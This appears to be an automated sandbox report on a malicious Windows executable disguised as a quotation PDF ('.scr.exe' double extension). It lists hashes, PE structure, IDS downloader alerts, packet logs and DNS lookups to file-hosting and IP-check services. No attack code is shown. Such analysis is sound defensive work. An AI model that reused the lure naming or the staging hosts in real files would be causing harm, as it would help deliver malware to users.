• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: QUOTATION_NOVQTRA071244PDF.scr.exe
Time | Type | Description
02:18:08 | API Interceptor | 13060x Sleep call for process: QUOTATION_NOVQTRA071244PDF.scr.exe modified
02:19:00 | API Interceptor | 65922x Sleep call for process: aspnet_compiler.exe modified
                                                              No context
                                                              No created / dropped files found
File type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit): 2.4218683729357977
TrID:
• Win64 Executable GUI Net Framework (217006/5) 49.88%
• Win64 Executable GUI (202006/5) 46.43%
• Win64 Executable (generic) (12005/4) 2.76%
• Generic Win/DOS Executable (2004/3) 0.46%
• DOS Executable Generic (2002/1) 0.46%
File name: QUOTATION_NOVQTRA071244PDF.scr.exe
File size: 339'456 bytes
MD5: 5287698c5838c217c8330670920d1f22
SHA1: 61d94cd397d56e87a13207f680f88fdf829eef71
SHA256: 852c78744e828250542bb9ddf2d7f2797c5613d2ab69cbd0faff944469d2c03b
SHA512: 4a2a295344a3842c9913e7fc0050b53cbb2733fd91019136212f9094351daf4bdac9ad3bdd989b19fbb186bd21404153ac96847269b1b988b70aa9a60f7d9d19
SSDEEP: 768:gl7ult3Qg2ZzEjss2VSg1I1cn0sspAgpq8hLyg1uMN0+dzsRs+eEH:+uLQ7qPpqOLy0uyL+fH
TLSH: E574DA5A7A74A132ED00CA3419F69E15D2DBEE6C2BE0551D24C8F66D1B322FE8F079C1
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....M<g.........."...................... ....@...... .......................`............`...@......@............... .....
Icon Hash: 0e3333b0bbb3b035
Entrypoint: 0x400000
Entrypoint Section:
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x673C4D99 [Tue Nov 19 08:34:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash:
                                                              Instruction
                                                              dec ebp
                                                              pop edx
                                                              nop
                                                              add byte ptr [ebx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x51a36 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xf64 | 0x1000 | b20118d8703552eebb902f8468080055 | False | 0.580810546875 | data | 5.475520620642078 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0x51a36 | 0x51c00 | 71d627b1a12a8b73f219ba4d9e2e6024 | False | 0.071220374617737 | data | 2.3495579104603954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4370 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 |  |  | 0.7601351351351351
RT_ICON | 0x4498 | 0x368 | Device independent bitmap graphic, 16 x 32 x 24, image size 832 |  |  | 0.7155963302752294
RT_ICON | 0x4800 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 |  |  | 0.6826241134751773
RT_ICON | 0x4c68 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 |  |  | 0.5389784946236559
RT_ICON | 0x4f50 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3200 |  |  | 0.470679012345679
RT_ICON | 0x5bf8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 |  |  | 0.4378517823639775
RT_ICON | 0x6ca0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1536 |  |  | 0.36402439024390243
RT_ICON | 0x7308 | 0x1ca8 | Device independent bitmap graphic, 48 x 96 x 24, image size 7296 |  |  | 0.33110687022900764
RT_ICON | 0x8fb0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 |  |  | 0.30881742738589213
RT_ICON | 0xb558 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2560 |  |  | 0.2924174174174174
RT_ICON | 0xbfc0 | 0x3228 | Device independent bitmap graphic, 64 x 128 x 24, image size 12800 |  |  | 0.26580996884735203
RT_ICON | 0xf1e8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 |  |  | 0.24244213509683515
RT_ICON | 0x13410 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 |  |  | 0.014139568600763382
RT_GROUP_ICON | 0x55438 | 0xbc | data |  |  | 0.5797872340425532
RT_VERSION | 0x554f4 | 0x358 | data |  |  | 0.4158878504672897
RT_MANIFEST | 0x5584c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-20T08:19:00.694601+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49739 | 193.122.6.168 | 80 | TCP |
| 2024-11-20T08:19:01.944617+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49739 | 193.122.6.168 | 80 | TCP |
| 2024-11-20T08:19:02.546000+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49741 | 188.114.97.3 | 443 | TCP |
| 2024-11-20T08:19:03.257175+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49742 | 193.122.6.168 | 80 | TCP |
| 2024-11-20T08:19:03.803744+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP |
| 2024-11-20T08:19:04.632112+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49745 | 193.122.6.168 | 80 | TCP |
| 2024-11-20T08:19:05.913370+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49758 | 193.122.6.168 | 80 | TCP |
| 2024-11-20T08:19:07.194701+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49765 | 193.122.6.168 | 80 | TCP |
| 2024-11-20T08:19:08.444614+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49775 | 193.122.6.168 | 80 | TCP |
| 2024-11-20T08:19:09.913364+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49781 | 193.122.6.168 | 80 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Nov 20, 2024 08:18:14.124948025 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.124996901 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.125005007 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.125026941 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.125046968 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.125705004 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.125720978 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.125761986 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.125768900 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.125796080 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.125814915 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.126338005 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.126354933 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.126391888 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.126399040 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.126426935 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.126445055 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.127295017 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.127319098 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.127351046 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.127357006 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.127386093 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.127404928 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.128151894 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.128168106 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.128223896 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.128231049 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.128262043 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.128281116 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.129914045 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.129930973 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.130038977 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.130045891 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.130085945 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.130443096 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.130461931 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.130548000 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.130554914 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.130657911 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.212670088 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.212692976 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.212765932 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.212790012 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.212821960 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.212832928 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.213661909 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.213679075 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.213726044 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.213746071 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.213785887 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.214446068 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.214462042 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.214518070 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.214526892 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.214565992 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.216017962 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.216033936 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.216083050 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.216088057 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.216094017 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.216135025 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.216151953 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.216177940 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.216181993 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.216209888 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.216228008 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.216422081 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.216439009 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.216469049 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.216475010 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.216500044 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.216512918 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.217772961 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.218234062 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.218502998 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.218519926 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.218556881 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.218565941 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.218616962 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.218616962 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.218827963 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.219063044 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.219078064 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.219121933 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.219130993 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.219144106 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.219167948 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.301054955 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.301079035 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.301132917 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.301151037 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.301176071 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.301188946 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.302171946 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.302189112 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.302232981 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.302239895 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.302257061 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.302275896 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.302825928 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.302841902 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.302917957 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.302917957 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.302926064 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.302963972 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.303472996 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.303489923 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.303525925 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.303533077 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.303555012 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.303575039 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.304398060 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.304414034 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.304440975 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.304459095 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.304478884 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.304501057 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.305198908 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.305216074 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.305253983 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.305260897 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.305284977 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.305293083 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.306898117 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.306936026 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.306958914 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.306965113 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.306987047 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.307005882 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.307516098 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.307537079 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.307565928 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.307575941 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.307605028 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.307614088 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.389729023 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.389755964 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.389822960 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.389841080 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.389873028 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.389892101 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.390541077 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.390558004 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.390594006 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.390602112 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.390626907 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.390644073 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.391218901 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.391236067 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.391268969 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.391273975 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.391305923 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.391323090 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.391998053 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.392015934 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.392052889 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.392062902 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.392086983 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.392103910 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.392978907 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.392993927 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.393027067 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.393034935 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.393063068 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.393081903 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.393898010 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.393913984 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.393968105 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.393978119 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.394016027 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.395669937 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.395685911 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.395726919 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.395734072 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.395762920 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.395777941 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.396156073 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.396174908 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.396208048 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.396214962 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.396240950 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.396265984 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.402355909 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.478147984 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478172064 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478266954 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.478283882 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478329897 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.478753090 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478770018 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478825092 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.478833914 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478873968 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.479392052 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.479410887 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.479444981 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.479451895 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.479477882 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.479496956 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.480227947 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.480243921 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.480281115 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.480289936 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.480314970 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.480331898 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.481142044 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.481157064 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.481189013 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.481198072 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.481221914 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.481245041 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.482105970 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.482127905 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.482192039 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.482203007 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.482213974 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.482235909 CET49732443192.168.2.4188.114.97.3
                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Nov 20, 2024 08:18:10.155082941 CET | 50019 | 53 | 192.168.2.4 | 1.1.1.1
                                                              Nov 20, 2024 08:18:10.163335085 CET | 53 | 50019 | 1.1.1.1 | 192.168.2.4
                                                              Nov 20, 2024 08:18:12.423330069 CET | 64749 | 53 | 192.168.2.4 | 1.1.1.1
                                                              Nov 20, 2024 08:18:12.431993008 CET | 53 | 64749 | 1.1.1.1 | 192.168.2.4
                                                              Nov 20, 2024 08:18:59.744580030 CET | 63686 | 53 | 192.168.2.4 | 1.1.1.1
                                                              Nov 20, 2024 08:18:59.780251980 CET | 53 | 63686 | 1.1.1.1 | 192.168.2.4
                                                              Nov 20, 2024 08:19:00.774436951 CET | 52184 | 53 | 192.168.2.4 | 1.1.1.1
                                                              Nov 20, 2024 08:19:00.781559944 CET | 53 | 52184 | 1.1.1.1 | 192.168.2.4
                                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                              Nov 20, 2024 08:18:10.155082941 CET | 192.168.2.4 | 1.1.1.1 | 0x3ca7 | Standard query (0) | filetransfer.io | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:12.423330069 CET | 192.168.2.4 | 1.1.1.1 | 0xff6c | Standard query (0) | s24.filetransfer.io | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:59.744580030 CET | 192.168.2.4 | 1.1.1.1 | 0xc59c | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
